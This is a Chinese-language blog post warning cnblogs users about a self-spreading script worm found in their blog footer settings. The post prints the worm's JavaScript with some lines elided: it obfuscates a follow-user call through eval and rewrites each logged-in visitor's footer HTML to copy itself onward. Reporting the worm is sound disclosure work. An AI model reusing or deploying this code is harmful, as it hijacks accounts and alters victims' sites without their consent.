(抱歉占用首頁一會兒)
是博客園被黑了還是只有我的博客被黑了?
剛發現我的博客被加入了下面的代碼(出現在“管理->設置->頁腳Html代碼”里,其中一部分被我略去),有沒有人遇到一樣的情況?請管理員幫忙查一下。
這段代碼在我這兒運行以后的效果是自動關注Darrel.Hsu的博客(鏈接是資料頁沒有惡意代碼,博客有惡意代碼,不要在登錄狀態下訪問),到現在這個博客已經增加了幾百粉絲(23:44有554粉絲,24:00時有565粉絲)。
Update: 可能是有某位注冊用戶在自己博客里加了這段代碼,然后凡是處於登錄狀態下的園友訪問這個用戶的博客后都會被感染;如果處於未登錄狀態,則跳回到登錄頁,結果是博客里的所有文章都無法正常打開。
被加入的代碼如下:
<script>function hack(){ var id = "D_Hacker" + parseInt( Math.random() * 1000 ); function createIframe( src , cb ){ var iframe ; if( ! ( iframe = document.getElementById( id ) ) ){ ...//略 } iframe.onload = function(){ cb( iframe ) } ; if( src.indexOf("http") == 0 ){ iframe.src = src ; }else{ var doc = iframe.contentWindow.document; doc.open(); doc.write( src ); doc.close(); } } var m = ["c", "n", "b", "l", "o", "g", "s", ".", "U", "s", "e", "r", "M", "a", "n", "a", "g", "e", "r", ".", "F", "o", "l", "l", "o", "w", "B", "l", "o", "g", "g", "e", "r"] m = m.join("") window.eval( m + '("b8a15066-1039-e011-ac81-842b2b196315")') createIframe("http://www.cnblogs.com/",function( iframe ){ var win = iframe.contentWindow; var href = $("#span_userinfo a:eq(1)", win.document ); href = href.attr("href") + "admin/Configure.aspx"; createIframe( href , function( iframe ){ ...//略 if( val.indexOf("b8a15066()") < 0 ){ val = val + "<scri"+"pt>"+ hack.toString() +";hack();</scr" +"ipt>"; $("#Edit_txbPageEndHtml",doc).val( val ); $("#Edit_lkbPost" , doc ).trigger("click"); } }); }) };hack();</script>
不知道怎么聯系dudu,而且dudu的博客也被感染了,大家先檢查一下自己的博客吧。